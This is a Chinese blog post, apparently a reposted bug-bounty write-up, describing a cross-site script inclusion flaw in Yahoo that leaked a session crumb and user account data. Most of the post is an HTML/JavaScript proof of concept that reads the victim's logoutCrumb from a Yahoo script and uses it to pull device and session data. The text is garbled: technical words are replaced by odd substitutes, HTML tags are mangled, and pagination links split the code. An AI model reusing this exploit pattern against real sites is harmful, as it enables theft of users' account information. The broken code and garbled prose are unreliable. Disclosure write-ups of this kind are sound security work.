看我如何发现雅虎XSSi漏洞实现用户信息窃取

今朝来说,因为XSSi破绽存在广泛且短缺有效的检测手段,导致其破绽迫害程度增添

发明某种特定种别破绽由两个关键部分组成,那便是对破绽的认知以及掘客的难易程度跨站脚本包孕破绽(XSSi)在公认的安然标准OWASP TOP 10中并未被说起,而且它也没有一些公开可使用的对象但它的影响涉及小我存储信息泄露、token保护机制绕过以及账户挟制等在这篇文章中我将分享我发明的一个雅虎XSSi破绽,使用该破绽可以实现对雅虎用户的信息偷取

端倪

在介入雅虎(Yahoo)破绽众测项目中,在我某次用BurpSuite来进行抓包阐发时,偶尔看到了以下这个哀求:

在我发明这是一个JSONP办事端之后,我立马意识到这可能会形成一个XSSi破绽(跨站脚本包孕)在雅虎网站API中,.crumb 值着实便是一个随机字符串,它与用户的session和身份验证值相关,我留意到,假如在该哀求中,GET参数 .crumb 值无效的话,其相应如下:

使用

现在,我想,假如能以某种要领去偷取到受害者的有效.crumb 值的话,那么就能偷取到对方的详细账号信息值了是以,我就在BurpSuite的抓包中来查找所有包孕有效 .crumb 值的哀求,终极,我发清楚明了在某个动态的Javascript文件存在这样的信息,该Javascript文件位于https://messenger.yahoo.com/embed/app.js假如你现在去反省这个Javascript文件,你会发明它此中的 logoutCrumb 值已经被删除修复了,我初次发明时,它的源代码如下:

现在,XSSi 破绽道理着实是这样的,它容许进击者绕过原始界限偷取特定类型数据,使用了标记的src属性来冲破同源策略( SOP),也即在标记中,浏览器不会阻拦网页加载图像和翰墨等第三方资本是以,为了偷取https://messenger.yahoo.com/embed/app.js中的有效回调 .crumb 值,然后把它放置在链接https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx中进行哀求,以获取到相关用户的session信息,我编写了如下PoC代码:

html>

head>

title>Yahoo XSSi PoCtitle>

head>

body>

div style=”width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;”>

h1 style=”text-align: center;”>Proof of Concepth1>

b>Dataset 1:b>

div id=”content1″ style=”width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;”>div>

br/>

b>Dataset 2:b>

div id=”content2″ style=”width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;”>div>

div>

script>

function processDeviceUsers(data) {

document.getElementById(“content1”).innerHTML = JSON.stringify(data);

}

window.onload = function () {

var config = {};

config_data = {};

[1] [2]下一页

config.merge = function(data) { config_data = data };

iris.initConfig(config);

document.getElementById(“content2”).innerHTML =JSON.stringify(config_data);

var src = “https://jsapi.login.yahoo.com/w/device_users?.crumb=” + config_data.session.logoutCrumb;

var s = document.createElement(‘script’);

s.setAttribute(‘src’, src);

document.body.appendChild(s);

}

script>

script src=”https://messenger.yahoo.com/embed/app.js”>script>

script src=”https://code.jquery.com/jquery-3.3.1.min.js”>script>

body>

html>

以下便是测试的效果图:

总之,我照样花了很多多少光阴来为这个破绽作PoC测试,终极得到了Yahoo方面$750的奖励,盼望大年夜家能从我的分享中有所劳绩

上一页[1] [2]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包